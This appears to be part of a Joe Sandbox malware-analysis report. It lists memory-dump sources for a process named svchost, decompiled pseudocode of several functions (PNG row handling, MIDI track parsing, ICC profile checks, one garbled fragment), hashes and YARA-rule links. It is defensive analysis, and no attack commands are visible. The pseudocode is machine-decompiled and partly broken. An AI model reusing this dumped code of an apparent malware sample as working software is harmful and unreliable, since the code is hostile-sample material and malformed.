    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID:
    • String ID: invalid distance code$invalid literal/length code
    • API String ID: 0-1393003055
    • Opcode ID: d7137552c1f7949f0ac454cb51f527cfea54f5a9eeba1bcf2726b97dc7e54ca1
    • Instruction ID: 8c43a1f8df1f769678fe5b45a8d56f38297c3618a8b4f4d388801401877cbf6d
    • Opcode Fuzzy Hash: d7137552c1f7949f0ac454cb51f527cfea54f5a9eeba1bcf2726b97dc7e54ca1
    • Instruction Fuzzy Hash: 91C1C0716087518FC718CF2DD5A016AFBE1FB89310F194A6EE8DA93741CB74A815CB8A
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0044E700 Relevance: 2.8, Strings: 2, Instructions: 266COMMONCrypto
    Download Yara Rule
    C-Code - Quality: 73%
    			E0044E700(void* __edi, void* __fp0) {
				unsigned int _t96;
				signed int _t107;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t127;
				signed int _t134;
				signed char _t137;
				signed int _t142;
				signed int _t147;
				signed int _t148;
				intOrPtr _t164;
				intOrPtr _t173;
				unsigned int _t178;
				intOrPtr _t183;
				signed int _t187;
				signed int _t190;
				signed int _t191;
				void* _t214;
				signed int _t216;
				signed int _t217;
				intOrPtr _t218;
				void* _t219;
				intOrPtr _t223;
				signed int _t224;
				void* _t225;
				void* _t226;
				void* _t228;
				void* _t231;

				_t214 = __edi;
				_t223 =  *((intOrPtr*)(_t225 + 0x10));
				_push(_t223);
				E0044EED0(__fp0);
				_t226 = _t225 + 4;
				if( *((intOrPtr*)(_t223 + 0x154)) == 0) {
					_t224 =  *(_t223 + 0x100);
					 *(_t223 + 0x108) =  *(_t223 + 0x104);
					 *(_t223 + 0x114) = _t224;
				} else {
					if(( *(_t223 + 0x7c) & 0x00000002) != 0) {
						_t127 =  *(_t223 + 0x104);
					} else {
						_t134 =  *0x499038; // 0x40000
						_t187 =  *0x499040; // 0x4080808
						_t127 = ( *(_t223 + 0x104) - (_t134 & 0x000000ff) + (_t187 & 0x000000ff) - 1) / (_t187 & 0x000000ff);
					}
					_t224 =  *(_t223 + 0x100);
					 *(_t223 + 0x108) = _t127;
					 *(_t223 + 0x114) = (_t224 + 0xffffffffffffffff) / 0;
				}
				_t137 =  *(_t223 + 0x7c);
				_t96 =  *((intOrPtr*)(_t223 + 0x15a));
				if((_t137 & 0x00000004) != 0 &&  *((char*)(_t223 + 0x158)) < 8) {
					_t96 = 8;
				}
				_push(_t214);
				_t216 = _t137 & 0x00001000;
				if(_t216 != 0) {
					_t183 =  *((intOrPtr*)(_t223 + 0x157));
					if(_t183 != 3) {
						if(_t183 != 0) {
							if(_t183 == 2 &&  *(_t223 + 0x150) != 0) {
								_t96 = (0x55555556 * _t96 * 4 >> 0x20) + (0x55555556 * _t96 * 4 >> 0x20 >> 0x1f);
							}
						} else {
							if(_t96 < 8) {
								_t96 = 8;
							}
							if( *(_t223 + 0x150) != 0) {
								_t96 = _t96 + _t96;
							}
						}
					} else {
						asm("sbb eax, eax");
						_t96 = ( ~( *(_t223 + 0x150)) & 0x00000008) + 0x18;
					}
				}
				if((_t137 & 0x00000002) != 0) {
					if(_t216 == 0) {
						 *(_t223 + 0x7c) = _t137 & 0x000000fd;
					} else {
						if( *((char*)(_t223 + 0x158)) < 0x10) {
							_t96 = _t96 + _t96;
						}
					}
				}
				_t217 =  *(_t223 + 0x7c);
				_t190 = _t217 & 0x00008000;
				if(_t190 == 0) {
					L32:
					if((_t217 & 0x00004000) == 0) {
						L41:
						if((_t217 & 0x00100000) != 0 && 0 > _t96) {
							_t96 = 0;
						}
						 *(_t223 + 0x15e) = _t96;
						_t142 = _t224 + 0x00000007 & 0xfffffff8;
						 *((char*)(_t223 + 0x15f)) = 0;
						if(_t96 < 8) {
							_t191 = _t142 * _t96 + 7 >> 3;
						} else {
							_t191 = (_t96 >> 3) * _t142;
						}
						_t218 = (_t96 + 7 >> 3) + _t191 + 1 + 0x30;
						if(_t218 >  *((intOrPtr*)(_t223 + 0x2b4))) {
							E00449E80(_t223,  *((intOrPtr*)(_t223 + 0x27c)));
							E00449E80(_t223,  *((intOrPtr*)(_t223 + 0x2c8)));
							_t231 = _t226 + 0x10;
							_push(_t218);
							_push(_t223);
							if( *((intOrPtr*)(_t223 + 0x154)) == 0) {
								_t116 = E00449E10();
							} else {
								_t116 = E00449C70(_t218);
							}
							 *((intOrPtr*)(_t223 + 0x27c)) = _t116;
							_t117 = E00449E10(_t223, _t218);
							_t226 = _t231 + 0x10;
							 *((intOrPtr*)(_t223 + 0x2c8)) = _t117;
							 *((intOrPtr*)(_t223 + 0x2b4)) = _t218;
							 *((intOrPtr*)(_t223 + 0x124)) =  *((intOrPtr*)(_t223 + 0x27c)) + 0x20 - ( *((intOrPtr*)(_t223 + 0x27c)) + 0x00000020 & 0x0000000f) - 1;
							 *(_t223 + 0x120) = _t117 + 0x20 - (_t117 + 0x00000020 & 0x0000000f) - 1;
						}
						if( *((intOrPtr*)(_t223 + 0x110)) > 0xfffffffe) {
							E00449530(_t223, "Row has too many bytes to allocate in memory");
							_t226 = _t226 + 8;
						}
						_t219 =  *(_t223 + 0x120);
						_t147 =  *((intOrPtr*)(_t223 + 0x110)) + 1;
						_t148 = _t147 >> 2;
						memset(_t219 + _t148, memset(_t219, 0, _t148 << 2), (_t147 & 0x00000003) << 0);
						_t228 = _t226 + 0x18;
						_t104 =  *((intOrPtr*)(_t223 + 0x2b8));
						if( *((intOrPtr*)(_t223 + 0x2b8)) != 0) {
							 *((intOrPtr*)(_t223 + 0x2bc)) = 0;
							 *((intOrPtr*)(_t223 + 0x2b8)) = 0;
							E00449E80(_t223, _t104);
							_t228 = _t228 + 8;
						}
						if(E0044B8D0(_t223, 0x49444154) != 0) {
							E00449530(_t223,  *((intOrPtr*)(_t223 + 0x9c)));
						}
						_t107 =  *(_t223 + 0x78) | 0x00000040;
						 *(_t223 + 0x78) = _t107;
						return _t107;
					}
					if( *(_t223 + 0x150) == 0 || (_t217 & 0x00001000) == 0) {
						if(_t190 != 0) {
							goto L40;
						}
						_t164 =  *((intOrPtr*)(_t223 + 0x157));
						if(_t164 == 4) {
							goto L40;
						}
						if(_t96 > 8) {
							asm("sbb ecx, ecx");
							_t96 = ( ~(_t164 - 6) & 0xfffffff0) + 0x40;
						} else {
							asm("sbb ecx, ecx");
							_t96 = ( ~(_t164 - 6) & 0xfffffff8) + 0x20;
						}
					} else {
						L40:
						_t96 = ((0 | _t96 - 0x00000010 > 0x00000000) - 0x00000001 & 0xffffffe0) + 0x40;
					}
					goto L41;
				} else {
					_t173 =  *((intOrPtr*)(_t223 + 0x157));
					if(_t173 != 0) {
						if(_t173 == 2 || _t173 == 3) {
							_t178 = ((0 | _t96 - 0x00000020 > 0x00000000) - 0x00000001 & 0xffffffe0) + 0x40;
							goto L31;
						} else {
							goto L32;
						}
					} else {
						_t178 = ((0 | _t96 - 0x00000008 > 0x00000000) - 0x00000001 & 0xfffffff0) + 0x20;
						L31:
						_t96 = _t178;
						goto L32;
					}
				}
			}































    0x0044e700
    0x0044e703
    0x0044e707
    0x0044e708
    0x0044e713
    0x0044e718
    0x0044e78c
    0x0044e792
    0x0044e798
    0x0044e71a
    0x0044e71e
    0x0044e748
    0x0044e720
    0x0044e720
    0x0044e725
    0x0044e744
    0x0044e744
    0x0044e74e
    0x0044e754
    0x0044e77e
    0x0044e77e
    0x0044e79e
    0x0044e7a3
    0x0044e7ac
    0x0044e7b7
    0x0044e7b7
    0x0044e7bc
    0x0044e7bf
    0x0044e7c5
    0x0044e7c7
    0x0044e7d0
    0x0044e7e8
    0x0044e805
    0x0044e824
    0x0044e824
    0x0044e7ea
    0x0044e7ed
    0x0044e7ef
    0x0044e7ef
    0x0044e7fc
    0x0044e7fe
    0x0044e7fe
    0x0044e7fc
    0x0044e7d2
    0x0044e7dc
    0x0044e7e1
    0x0044e7e1
    0x0044e7d0
    0x0044e829
    0x0044e82d
    0x0044e83f
    0x0044e82f
    0x0044e836
    0x0044e838
    0x0044e838
    0x0044e836
    0x0044e82d
    0x0044e842
    0x0044e84c
    0x0044e852
    0x0044e889
    0x0044e88f
    0x0044e8e8
    0x0044e8ee
    0x0044e901
    0x0044e901
    0x0044e906
    0x0044e90c
    0x0044e912
    0x0044e919
    0x0044e92e
    0x0044e91b
    0x0044e920
    0x0044e920
    0x0044e93a
    0x0044e945
    0x0044e94f
    0x0044e95c
    0x0044e967
    0x0044e96c
    0x0044e96d
    0x0044e96e
    0x0044e977
    0x0044e970
    0x0044e970
    0x0044e970
    0x0044e97f
    0x0044e987
    0x0044e992
    0x0044e998
    0x0044e9a6
    0x0044e9af
    0x0044e9bd
    0x0044e9bd
    0x0044e9ca
    0x0044e9d2
    0x0044e9d7
    0x0044e9d7
    0x0044e9e0
    0x0044e9e6
    0x0044e9eb
    0x0044e9f5
    0x0044e9f5
    0x0044e9f7
    0x0044ea02
    0x0044ea06
    0x0044ea0c
    0x0044ea12
    0x0044ea17
    0x0044ea17
    0x0044ea2a
    0x0044ea34
    0x0044ea39
    0x0044ea3f
    0x0044ea41
    0x0044ea47
    0x0044ea47
    0x0044e899
    0x0044e8a5
    0x00000000
    0x00000000
    0x0044e8a7
    0x0044e8b0
    0x00000000
    0x00000000
    0x0044e8b5
    0x0044e8cd
    0x0044e8d4
    0x0044e8b7
    0x0044e8bc
    0x0044e8c4
    0x0044e8c4
    0x0044e8d8
    0x0044e8d8
    0x0044e8e6
    0x0044e8e6
    0x00000000
    0x0044e854
    0x0044e854
    0x0044e85c
    0x0044e872
    0x0044e885
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0044e85e
    0x0044e86a
    0x0044e887
    0x0044e887
    0x00000000
    0x0044e887
    0x0044e85c

    Strings
    • VUUU, xrefs: 0044E818
    • Row has too many bytes to allocate in memory, xrefs: 0044E9CC
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID:
    • String ID: Row has too many bytes to allocate in memory$VUUU
    • API String ID: 0-4092465491
    • Opcode ID: 4e906f6c4c4e9df61761cde4e437a0bb8b89d21aa47a8e28724e1d30fd6221a1
    • Instruction ID: 80edfd695f178fd55a1b1c708efd7f0ac74c16b442fcf20f366ce3f7a0459520
    • Opcode Fuzzy Hash: 4e906f6c4c4e9df61761cde4e437a0bb8b89d21aa47a8e28724e1d30fd6221a1
    • Instruction Fuzzy Hash: 64912771A04E404BF7299A3ACC567F7B7D2BB99315F18492ED5ABC7382D63CA840C358
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00428220 Relevance: 2.8, Strings: 2, Instructions: 257COMMONCrypto
    Download Yara Rule
    C-Code - Quality: 93%
    			E00428220(long __ecx) {
				void* _t83;
				signed int _t84;
				signed int _t86;
				intOrPtr _t96;
				signed int _t98;
				void* _t103;
				signed int _t106;
				signed int _t108;
				signed int _t111;
				signed int _t117;
				signed int _t119;
				intOrPtr _t124;
				signed int _t125;
				intOrPtr _t135;
				signed int _t136;
				void* _t137;
				void* _t138;
				void* _t139;
				signed int* _t147;
				void* _t160;
				signed int _t169;
				signed int _t191;
				signed int _t193;
				signed int _t197;
				intOrPtr _t208;
				void* _t209;
				signed int* _t210;
				signed int* _t211;
				signed int _t212;
				signed int _t213;
				signed int _t214;
				signed int* _t216;
				long _t217;
				void* _t218;
				signed int _t219;
				void* _t220;
				void* _t221;
				void* _t222;

				_t217 = __ecx;
				if( *((intOrPtr*)(__ecx + 8)) != 0) {
					E004280B0(__ecx);
				}
				_t208 =  *((intOrPtr*)(_t220 + 0x34));
				_t83 = E00428200(_t208,  *((intOrPtr*)(_t220 + 0x38)));
				_t221 = _t220 + 8;
				if(_t83 != 0) {
					_t84 =  *(_t208 + 4);
					_t209 = _t208 + 4;
					__eflags = ((_t84 & 0x00ff0000 | _t84 >> 0x00000010) >> 0x00000008 | (_t84 << 0x00000010 | _t84 & 0x0000ff00) << 0x00000008) - 6;
					if(((_t84 & 0x00ff0000 | _t84 >> 0x00000010) >> 0x00000008 | (_t84 << 0x00000010 | _t84 & 0x0000ff00) << 0x00000008) == 6) {
						_t210 = _t209 + 4;
						_t218 = _t217 + 0x5c;
						_t147 = _t210;
						_t211 =  &(_t210[1]);
						 *((intOrPtr*)(_t221 + 0x18)) = 0;
						 *((intOrPtr*)(_t221 + 0x1c)) = 0;
						_t86 =  *_t147;
						 *((intOrPtr*)(_t221 + 0x20)) = 0;
						 *(_t221 + 0x10) = _t86;
						 *(_t221 + 0x14) = _t147[1];
						 *(_t217 + 0xc) = (_t86 & 0x0000ffff) >> 8;
						 *(_t217 + 0x10) = ( *(_t221 + 0x12) & 0x0000ffff) >> 8;
						 *((intOrPtr*)(_t221 + 0x24)) = 0;
						 *(_t217 + 0x14) = ( *(_t221 + 0x14) & 0x0000ffff) >> 8;
						 *((intOrPtr*)(_t221 + 0x34)) = 0;
						 *((char*)(_t221 + 0x38)) = 0;
						_t96 = E00429E70( *((intOrPtr*)(_t218 + 8)),  *((intOrPtr*)(_t218 + 8)),  *(_t218 + 4));
						_t222 = _t221 + 0xc;
						_t135 = _t96;
						E0043D380(_t96, _t135,  *((intOrPtr*)(_t218 + 8)));
						 *((intOrPtr*)(_t218 + 8)) = _t135;
						_t98 =  *(_t218 + 4);
						_t136 =  *(_t217 + 0x10);
						__eflags = _t98;
						if(_t98 != 0) {
							_t191 = (0x2aaaaaab * ( *((intOrPtr*)(_t218 + 8)) - _t98) >> 0x20 >> 2) + (0x2aaaaaab * ( *((intOrPtr*)(_t218 + 8)) - _t98) >> 0x20 >> 2 >> 0x1f);
							__eflags = _t191;
						} else {
							_t191 = 0;
						}
						__eflags = _t191 - _t136;
						if(_t191 >= _t136) {
							_t103 = E00429570(_t218);
							__eflags = _t136 - _t103;
							if(_t136 < _t103) {
								E004298A0(_t218,  *(_t218 + 4) + (_t136 + _t136 * 2) * 8,  *((intOrPtr*)(_t218 + 8)));
							}
						} else {
							 *((intOrPtr*)(_t222 + 0x10)) =  *((intOrPtr*)(_t218 + 8));
							_push(_t222 + 0x18);
							_push(_t136 - E00429570(_t218));
							_push( *((intOrPtr*)(_t222 + 0x14)));
							E004295A0(_t218);
						}
						_t137 = 0;
						__eflags =  *(_t217 + 0x10);
						if( *(_t217 + 0x10) <= 0) {
							L20:
							 *((intOrPtr*)(_t217 + 4)) =  *((intOrPtr*)(_t222 + 0x38));
							_t160 = _t217 + 0x6c;
							 *(_t217 + 8) =  *(_t222 + 0x34);
							 *((intOrPtr*)(_t217 + 0x58)) =  *((intOrPtr*)(_t222 + 0x3c));
							_t193 =  *(_t160 + 8);
							_t212 =  *(_t160 + 4);
							_t106 = _t193;
							__eflags = _t106 - _t193;
							while(_t106 != _t193) {
								_t139 =  *_t106;
								_t106 = _t106 + 4;
								 *_t212 = _t139;
								_t212 = _t212 + 4;
								__eflags = _t106 - _t193;
							}
							 *(_t160 + 8) = _t212;
							_t213 =  *(_t160 + 4);
							 *(_t222 + 0x34) =  *(_t160 + 8);
							__eflags = _t213;
							 *(_t222 + 0x34) = 0x64;
							if(_t213 == 0) {
								L25:
								_t108 = 0;
								goto L27;
							} else {
								_t197 =  *(_t160 + 8);
								__eflags = _t197 - _t213 >> 2 - 0x10;
								if(__eflags >= 0) {
									if(__eflags > 0) {
										_t117 = _t197;
										_t214 = _t213 + 0x40;
										__eflags = _t117 - _t197;
										while(_t117 != _t197) {
											_t138 =  *_t117;
											_t117 = _t117 + 4;
											 *_t214 = _t138;
											_t214 = _t214 + 4;
											__eflags = _t117 - _t197;
										}
										 *(_t160 + 8) = _t214;
										 *(_t222 + 0x34) =  *(_t160 + 8);
									}
								} else {
									__eflags = _t213;
									if(_t213 != 0) {
										_t119 =  *(_t160 + 8) - _t213;
										__eflags = _t119;
										_t108 = _t119 >> 2;
									} else {
										goto L25;
									}
									L27:
									_push(_t222 + 0x34);
									_push(0x10 - _t108);
									_push( *(_t160 + 8));
									E004298E0(_t160);
								}
							}
							_t111 = E00428EB0(_t217);
							asm("sbb eax, eax");
							return  ~( ~_t111);
						} else {
							_t219 = 0;
							__eflags = 0;
							while(1) {
								__eflags =  *_t211 - 0x6b72544d;
								if( *_t211 != 0x6b72544d) {
									goto L3;
								}
								_t121 = _t211[1];
								_t216 =  &(_t211[2]);
								 *( *((intOrPtr*)(_t217 + 0x60)) + _t219 + 4) = (_t211[1] & 0x00ff0000 | _t211[1] >> 0x00000010) >> 0x00000008 | (_t211[1] << 0x00000010 | _t121 & 0x0000ff00) << 0x00000008;
								 *( *((intOrPtr*)(_t217 + 0x60)) + _t219 + 0xc) = _t216;
								 *( *((intOrPtr*)(_t217 + 0x60)) + _t219 + 8) = _t216;
								_t124 =  *((intOrPtr*)(_t217 + 0x60));
								_t169 =  *(_t124 + _t219 + 4);
								_t211 = _t216 + _t169;
								__eflags = _t169;
								if(_t169 != 0) {
									_t125 = E00428C10(_t124 + _t219, _t124 + _t219 + 0x10);
									__eflags = _t125;
									if(_t125 == 0) {
										goto L3;
									} else {
										goto L19;
									}
								} else {
									 *(_t124 + _t219) =  *(_t124 + _t219) | 0x00000001;
									L19:
									_t137 = _t137 + 1;
									_t219 = _t219 + 0x18;
									__eflags = _t137 -  *(_t217 + 0x10);
									if(_t137 <  *(_t217 + 0x10)) {
										continue;
									} else {
										goto L20;
									}
								}
								goto L33;
							}
							goto L3;
						}
					} else {
						__eflags = 0;
						return 0;
					}
				} else {
					L3:
					return 0;
				}
				L33:
			}









































    0x00428226
    0x0042822e
    0x00428230
    0x00428230
    0x00428239
    0x0042823f
    0x00428244
    0x00428249
    0x00428257
    0x0042825a
    0x00428280
    0x00428283
    0x00428291
    0x00428294
    0x00428297
    0x00428299
    0x0042829c
    0x004282a0
    0x004282a4
    0x004282a6
    0x004282aa
    0x004282bb
    0x004282d2
    0x004282e7
    0x004282ef
    0x004282f3
    0x004282ff
    0x00428303
    0x00428308
    0x00428310
    0x00428313
    0x00428319
    0x0042831e
    0x00428321
    0x00428324
    0x00428327
    0x00428329
    0x00428343
    0x00428343
    0x0042832b
    0x0042832b
    0x0042832b
    0x00428345
    0x00428347
    0x0042836f
    0x00428374
    0x00428376
    0x00428388
    0x00428388
    0x00428349
    0x00428350
    0x00428354
    0x00428362
    0x00428363
    0x00428366
    0x00428366
    0x00428390
    0x00428392
    0x00428394
    0x00428423
    0x0042842f
    0x00428432
    0x00428435
    0x00428438
    0x0042843b
    0x0042843e
    0x00428441
    0x00428443
    0x00428445
    0x00428447
    0x00428449
    0x0042844c
    0x0042844e
    0x00428451
    0x00428451
    0x00428458
    0x0042845b
    0x0042845e
    0x00428462
    0x00428464
    0x0042846c
    0x00428481
    0x00428481
    0x00000000
    0x0042846e
    0x0042846e
    0x00428478
    0x0042847b
    0x004284a5
    0x004284a7
    0x004284a9
    0x004284ac
    0x004284ae
    0x004284b0
    0x004284b2
    0x004284b5
    0x004284b7
    0x004284ba
    0x004284ba
    0x004284c1
    0x004284c4
    0x004284c4
    0x0042847d
    0x0042847d
    0x0042847f
    0x00428488
    0x00428488
    0x0042848a
    0x00000000
    0x00000000
    0x00000000
    0x0042848d
    0x00428491
    0x0042849c
    0x0042849d
    0x0042849e
    0x0042849e
    0x0042847b
    0x004284ca
    0x004284d3
    0x004284dc
    0x0042839a
    0x0042839a
    0x0042839a
    0x0042839c
    0x0042839c
    0x004283a2
    0x00000000
    0x00000000
    0x004283a8
    0x004283b8
    0x004283d7
    0x004283de
    0x004283e5
    0x004283e9
    0x004283ec
    0x004283f0
    0x004283f2
    0x004283f4
    0x00428407
    0x0042840c
    0x0042840e
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x004283f6
    0x004283f6
    0x00428414
    0x00428417
    0x00428418
    0x0042841b
    0x0042841d
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0042841d
    0x00000000
    0x004283f4
    0x00000000
    0x0042839c
    0x00428288
    0x00428288
    0x0042828e
    0x0042828e
    0x0042824e
    0x0042824e
    0x00428254
    0x00428254
    0x00000000

    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID:
    • String ID: MTrk$d
    • API String ID: 0-4044675371
    • Opcode ID: 854d98c159ea09a42487003e3273e03e3d92713c94f82c3eaa97afae3cb6ca83
    • Instruction ID: 36a138734d5fd25b70b62b098a803fff5c462d8497843081f871c208e4a26ede
    • Opcode Fuzzy Hash: 854d98c159ea09a42487003e3273e03e3d92713c94f82c3eaa97afae3cb6ca83
    • Instruction Fuzzy Hash: F291D371B016168FD718DF29D88096EB7E2EFD8304B54893EE84ACB341EA39ED05C759
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00440DE0 Relevance: 2.6, Strings: 2, Instructions: 115COMMONCrypto
    Download Yara Rule
    C-Code - Quality: 37%
    			E00440DE0() {
				intOrPtr _t38;
				intOrPtr _t66;
				intOrPtr _t70;
				void* _t95;
				void* _t103;

				_t95 =  *((intOrPtr*)(_t103 + 0x24)) + 0x84;
				_t38 = 0xbadbad;
				 *((intOrPtr*)(_t103 + 0x28)) = 0;
				 *(_t103 + 0x10) = 0 << 8;
				if(0 << 8 == 0) {
					L6:
					return 1;
				} else {
					L1:
					L1:
					if(1 != 0) {
						E00440860( *((intOrPtr*)(_t103 + 0x18)), 0,  *((intOrPtr*)(_t103 + 0x20)), 0 << 8, "ICC profile tag start not a multiple of 4");
						_t38 =  *((intOrPtr*)(_t103 + 0x24));
						_t103 = _t103 + 0x14;
					}
					_t66 =  *((intOrPtr*)(_t103 + 0x24));
					if(0xbadbad > _t66 || 0xbadbad > _t66 - 0xbadbad) {
						goto L7;
					}
					_t95 = _t95 + 0xc;
					_t70 =  *((intOrPtr*)(_t103 + 0x28)) + 1;
					 *((intOrPtr*)(_t103 + 0x28)) = _t70;
					if(_t70 < _t38) {
						goto L1;
					} else {
						goto L6;
					}
					goto L8;
					L7:
					return E00440860( *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)),  *((intOrPtr*)(_t103 + 0x20)), 0xbadbad, "ICC profile tag outside profile");
				}
				L8:
			}








    0x00440e13
    0x00440e1c
    0x00440e1e
    0x00440e26
    0x00440e2a
    0x00440ee4
    0x00440eeb
    0x00440e30
    0x00000000
    0x00440e30
    0x00440e9f
    0x00440eb3
    0x00440eb8
    0x00440ebc
    0x00440ebc
    0x00440ebf
    0x00440ec5
    0x00000000
    0x00000000
    0x00440ed1
    0x00440ed4
    0x00440ed7
    0x00440edb
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00440eec
    0x00440f0e
    0x00440f0e
    0x00000000

    Strings
    • ICC profile tag start not a multiple of 4, xrefs: 00440EA9
    • ICC profile tag outside profile, xrefs: 00440EF8
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID:
    • String ID: ICC profile tag outside profile$ICC profile tag start not a multiple of 4
    • API String ID: 0-2051163487
    • Opcode ID: 17b50337cbba9aabcd0db8ec6328b0c6ff122c9fe82f923f027972601d2876d2
    • Instruction ID: aab874bc816a8918cfdc1020be24f3f581c27acd4ec4614056e658a2d0b3f7d9
    • Opcode Fuzzy Hash: 17b50337cbba9aabcd0db8ec6328b0c6ff122c9fe82f923f027972601d2876d2
    • Instruction Fuzzy Hash: 9031E5B360879107E72CCA2E9C606ABBBD3ABC8245F1DC96DE5DAC3301E8659605C758
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00494D1E Relevance: 2.4, Instructions: 2355COMMONCrypto
    Download Yara Rule
    C-Code - Quality: 60%
    			E00494D1E(void* __eax, signed int __ebx, signed int __ecx, void* __edx, void* __edi, void* __esi) {
				char _t25;
				signed char _t34;
				signed int _t38;
				void* _t45;
				void* _t49;
				signed int _t52;

				_t49 = __esi;
				_t45 = __edi;
				_t38 = __ecx;
				_t25 = __eax + 1;
				 *_t25 =  *_t25 + __ecx;
				 *_t25 =  *_t25 + _t25;
				asm("invalid");
				 *0xf16ae8b9 = _t25;
				_t34 = __ebx & __ecx;
				_push(es);
				if(__edx - 1 > 0) {
					asm("in eax, 0xa7");
					asm("cld");
					_t38 = 0x6a;
					 *(__esi - 0x24) =  *(__esi - 0x24) ^ _t52;
				}
				asm("fdivr qword [ecx+0x1c]");
			}









    0x00494d1e
    0x00494d1e
    0x00494d1e
    0x00494d1e
    0x00494d1f
    0x00494d21
    0x00514d62
    0x00514d64
    0x00514d69
    0x00514d6b
    0x00514d6d
    0x00514d71
    0x00514d73
    0x00514d74
    0x00514d76
    0x00514d76
    0x00514d78

    Memory Dump Source
    • Source File: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
